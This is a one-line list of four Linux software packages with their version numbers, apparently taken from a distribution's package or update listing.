open-vm-tools-2012.8.8.1-37.2, preload-1.2-6.25.2, systemtap-1.4-1.5.1, virtualbox-4.0.12-0.54.2